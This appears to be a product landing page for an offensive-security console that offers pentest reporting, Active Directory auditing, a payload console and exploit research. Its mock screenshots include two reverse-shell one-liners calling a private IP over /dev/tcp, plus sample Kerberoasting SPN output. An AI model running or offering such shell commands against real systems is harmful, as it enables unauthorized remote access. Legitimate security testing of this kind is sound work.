Vulnerability Database
Deploy pre-configured finding templates for SQL Injection, XSS, and credential leaks directly into drafts.
CRITICAL
HIGH
MEDIUM
Modular apps, one workspace
Enable what you need, leave out what you don't. All tools hook into your account under a single credentials database.
Security Reporting
Compile professional pentesting reports using templated layouts and nested CVSS score calculators.
AD Auditor
Audit Windows domains, user delegations, and check for Kerberoasting susceptibility.
Payload Console
Generate and deliver payloads with customizable callback architectures.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Exploit Research
Validate service vulnerabilities and analyze package security vectors.
Liblzma Backdoor
FAIL
Log4j Injection
OK
SSH Bruteforce
OK
Exploit Database
Quick access to validated proofs-of-concept for common CVE mappings.
CVE-2024-3094
CVE-2021-44228
CVE-2023-3519
Sentinel Detections
Deploy corresponding SIEM detection rules alongside offensive playbooks.
Sysmon Process Creation
LDAP Queries Logged
RDP Pipe Access
Interactive Lab Shells
Connect directly to terminal shells inside our sandboxed simulation domains.
▶
sh -i >& /dev/tcp/10.10.14.2/4444
Technical depth
App Console Modules
Custom Templates
HTML layout & style design.
Design and customize report layout structures, CSS styles, typography variables, and classification headers to match your brand.
OffSec Reporting
Templated report builder.
Write markdown security advisories, calculate CVSS vectors dynamically, and export clean, executive-ready PDF findings.
AD Auditor
Domain path auditing.
Audit Kerberos settings, extract service accounts (SPNs), track group memberships, and visualize domain trust paths.
Payload Console
Interactive shellcode builders.
Generate customized binary payloads, MSFvenom setups, web shells, and configure multi-handling listeners.
🎨 Layout Template Editor
default.html
<!-- CSS Stylesheet -->
body { font-family: 'Outfit'; }
.report-header { color: #8b5cf6; }
.report-header { color: #8b5cf6; }
<!-- Report Document Header -->
<div class="header">
[CLASSIFICATION] - [CLIENT]
</div>
[CLASSIFICATION] - [CLIENT]
</div>
📝 Report Draft #42
CVSS 9.8
Unauthenticated SQL Injection in Portal
The 'id' parameter in /api/profile suffers from raw string concatenation, permitting administrative user bypass.
Impact: Administrative Account Takeover / RCE
# Extracting SPNs...
sql_service@offsec.local -> MSSQLSvc/db01:1433
http_app@offsec.local -> HTTP/portal.offsec.local
[!] sql_service SPN has weak RC4 encryption.
http_app@offsec.local -> HTTP/portal.offsec.local
[!] sql_service SPN has weak RC4 encryption.
# Generated reverse shell code:
sh -i >& /dev/tcp/10.10.14.2/9001 0>&1
Ready to consolidate your security tools?
Join other security operators using our modular console as a single, consolidated launchpad.
Join Waitlist